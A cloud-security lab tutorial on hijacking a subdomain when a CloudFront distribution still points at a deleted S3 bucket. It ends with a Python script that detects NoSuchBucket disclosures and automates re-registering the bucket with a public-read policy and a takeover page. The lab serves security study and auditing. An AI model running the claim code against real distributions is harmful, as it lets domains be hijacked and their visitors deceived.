AWS S3 is Amazon's object storage service. It holds any kind of file, and permissions can be granted per object and per bucket. More often than not, S3 buckets have been discovered with weak permissions on individual objects or on the entire bucket itself: files and folders that should never be public are made world-readable and exposed to anyone who cares to look.
Organisations often use this property of S3 to host their static websites and put them behind CloudFront. Amazon CloudFront is a content delivery network (CDN): it speeds up distribution of static and dynamic web content, such as HTML, JavaScript, CSS and image files, by serving it from edge locations close to the user. Many sites and organisations use it to distribute their content from servers local to their visitors.
What are we going to cover?
This chapter covers hijacking a subdomain after the S3 bucket behind a CloudFront distribution is deleted while the distribution keeps pointing at it (a dangling origin).
Steps to setup
There are mainly two services involved in the lab:
AWS S3
AWS CloudFront
The lab begins by creating a bucket and using it to host a static web application. A CloudFront distribution is then created with the S3 static website as its origin.
Now navigate to your AWS console and open the S3 section.
Create a bucket named www.unique-name.com and, under Object Ownership, enable ACLs.
Disable Block all public access while creating the bucket. This is the weak setting the lab depends on; outside a lab it should stay enabled unless the bucket really is meant to be public.
Once the bucket is created, navigate to the Properties tab.
Scroll to the bottom of the page to Static website hosting. Click Edit and enable it to serve the bucket as a website.
Now let's host the website with a simple HTML file (an index.html) and apply a bucket policy that makes the objects publicly readable.
If you get an error while pasting the policy, run it through a JSON beautifier to fix the formatting.
We have successfully created the bucket; now configure the S3 website as the origin of a CloudFront distribution.
Navigate to the CloudFront section and create a distribution, using the bucket's static website endpoint as the origin.
Under Viewer protocol policy, enable Redirect HTTP to HTTPS. Under Cache key and origin requests, select the CachingDisabled policy so that every request reaches the origin and you see origin changes immediately. Then click Create distribution.
Wait a few minutes for the distribution to deploy; you will get a CloudFront domain (a *.cloudfront.net hostname). Open it in your browser.
That completes the lab setup. Now follow the steps to attack.
Steps to attack
Once the environment is ready, open your browser and paste the distribution's domain name, which you can find in your AWS account under CloudFront.
In another tab, open the static website endpoint, which you can get from S3 > bucket > Properties. You should see the welcome page.
Navigate to the CloudFront domain and you should see the same welcome message, served through the distribution.
Now delete the bucket you created during setup (www.unique-name.com): go to S3 > Buckets, empty the bucket, then delete it. The CloudFront distribution is left untouched and still points at the origin.
Now, how can an attacker use this? Reload the CloudFront domain: instead of the welcome page, the distribution relays the origin's error page.
How to claim the subdomain via the dangling CloudFront origin
The error page discloses the S3 bucket name (a NoSuchBucket error carrying the BucketName). Because S3 bucket names are global, anyone with an AWS account can register that name once it is free. Wait a minute or so for the deleted name to become available, then create a new bucket with the same name in your own account.
Once the bucket is created, the attacker changes its permissions and properties to host a static website: disable Block all public access and add a bucket policy that allows public s3:GetObject on the bucket's objects.
Enable static website hosting with index.html as the index document. Nothing has to change on the CloudFront side: the victim's distribution still points at the origin hostname, so whatever the attacker uploads is what it serves. The takeover page can be anything you want to host; the lab's version is a static page with a little JavaScript that highlights the domain being hijacked.
Upload your files to the bucket, make sure index.html is among them, and navigate to the CloudFront domain. The takeover page is now served from the attacker's bucket under the victim's domain: the hijack is complete.
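The setup and claim steps above are all console clicks, and neither the bucket policy nor the takeover page is shown. The following Python script is an added example, not code from the original lab: it parses the error page a deleted S3 website or REST endpoint returns (the page CloudFront relays) and extracts the disclosed bucket name; decides whether the origin is actually dangling (only NoSuchBucket means the name is free, while AccessDenied or NoSuchKey means the bucket still exists); builds the public-read bucket policy the lab applies; and claims the bucket with boto3 using the same settings the setup section walked through. The sample error bodies are constructed, the function names and the www.unique-name.com bucket are illustrative, and claim_bucket() assumes boto3 with credentials for any AWS account plus the dash-style website endpoint of the older regions such as us-east-1.

```python
"""Dangling S3 origin: detect the NoSuchBucket disclosure and (re)claim the bucket.

Added example for the lab above, not the lab's own code. Sample bodies are constructed.
"""
import json
import re
import urllib.error
import urllib.request

# 1) What an S3 *website* endpoint returns after its bucket is deleted. CloudFront
#    relays this page unchanged, which is the disclosure the lab relies on.
SAMPLE_NOSUCHBUCKET_HTML = b"""<html><head><title>404 Not Found</title></head><body>
<h1>404 Not Found</h1><ul>
<li>Code: NoSuchBucket</li>
<li>Message: The specified bucket does not exist</li>
<li>BucketName: www.unique-name.com</li>
<li>RequestId: 0123456789ABCDEF</li>
</ul><hr/></body></html>"""
# 2) The same error from the S3 REST endpoint, which answers in XML.
SAMPLE_NOSUCHBUCKET_XML = (
    b'<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code>'
    b'<Message>The specified bucket does not exist</Message>'
    b'<BucketName>www.unique-name.com</BucketName><RequestId>0123</RequestId></Error>')
# 3) A bucket that still exists but belongs to someone else: nothing to claim.
SAMPLE_ACCESSDENIED_XML = (
    b'<Error><Code>AccessDenied</Code><Message>Access Denied</Message>'
    b'<RequestId>0123</RequestId></Error>')

# One pattern per field, covering both the XML tag form and the "Field: value" HTML form.
_CODE = re.compile(rb"<Code>([A-Za-z]+)</Code>|Code:\s*([A-Za-z]+)")
_BUCKET = re.compile(rb"<BucketName>([^<]+)</BucketName>|BucketName:\s*([^<\s]+)")


def _first(m):
    """Return the first populated capture group of a match, decoded, or None."""
    if m is None:
        return None
    return next(g for g in m.groups() if g is not None).decode()


def analyze(body: bytes) -> dict:
    """Classify an origin error page. Only NoSuchBucket means the bucket name is
    free to register (S3 names are global), i.e. the origin is truly dangling."""
    code = _first(_CODE.search(body))
    bucket = _first(_BUCKET.search(body))
    return {"code": code, "bucket": bucket,
            "dangling": code == "NoSuchBucket" and bucket is not None}


def probe(url: str, timeout: float = 10) -> dict:
    """Fetch a CloudFront (or origin) URL and analyze whatever error it relays.
    This is the only network call in the file; the samples above never use it."""
    req = urllib.request.Request(url, headers={"User-Agent": "dangling-origin-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body, status = resp.read(), resp.status
    except urllib.error.HTTPError as e:  # 403/404 responses carry the S3 error body
        body, status = e.read(), e.code
    result = analyze(body)
    result["status"] = status
    return result


def public_read_policy(bucket: str) -> dict:
    """Bucket policy that makes every object world-readable, as the lab does.
    A bucket policy is sufficient for website hosting; object ACLs are not needed."""
    return {"Version": "2012-10-17", "Statement": [{
        "Sid": "PublicReadGetObject", "Effect": "Allow", "Principal": "*",
        "Action": "s3:GetObject", "Resource": f"arn:aws:s3:::{bucket}/*"}]}


# Illustrative takeover page: a little JavaScript that names the hijacked host.
TAKEOVER_PAGE = """<!doctype html><html><body><h1>Subdomain takeover PoC</h1>
<p id="host"></p><script>document.getElementById('host').textContent =
 'Content on ' + location.hostname + ' is served from a bucket we control.';
</script></body></html>"""


def claim_bucket(bucket: str, region: str, page: str = TAKEOVER_PAGE) -> str:
    """Register the disclosed bucket name in our own account and serve a page from it.
    Assumes boto3 and credentials are available. The returned endpoint uses the
    dash form valid for older regions such as us-east-1 (assumption; newer regions
    use a dot, so check the console for yours)."""
    import boto3  # imported lazily so the offline parts of this file need no SDK
    s3 = boto3.client("s3", region_name=region)
    kwargs = {} if region == "us-east-1" else {
        "CreateBucketConfiguration": {"LocationConstraint": region}}
    s3.create_bucket(Bucket=bucket, **kwargs)
    s3.put_public_access_block(Bucket=bucket, PublicAccessBlockConfiguration={
        "BlockPublicAcls": False, "IgnorePublicAcls": False,
        "BlockPublicPolicy": False, "RestrictPublicBuckets": False})
    s3.put_bucket_policy(Bucket=bucket, Policy=json.dumps(public_read_policy(bucket)))
    s3.put_bucket_website(Bucket=bucket, WebsiteConfiguration={
        "IndexDocument": {"Suffix": "index.html"}})
    s3.put_object(Bucket=bucket, Key="index.html", Body=page.encode(),
                  ContentType="text/html")
    return f"http://{bucket}.s3-website-{region}.amazonaws.com"


if __name__ == "__main__":
    for name, body in (("website endpoint", SAMPLE_NOSUCHBUCKET_HTML),
                       ("REST endpoint", SAMPLE_NOSUCHBUCKET_XML),
                       ("foreign bucket", SAMPLE_ACCESSDENIED_XML)):
        print(name, analyze(body))
```

Run the file directly to see the three constructed bodies classified. To audit your own distributions, point probe() at each CloudFront domain and treat any result with dangling set to True as an origin to fix (recreate the bucket yourself or update the distribution) before someone else registers the name; only call claim_bucket() against names you are authorised to take.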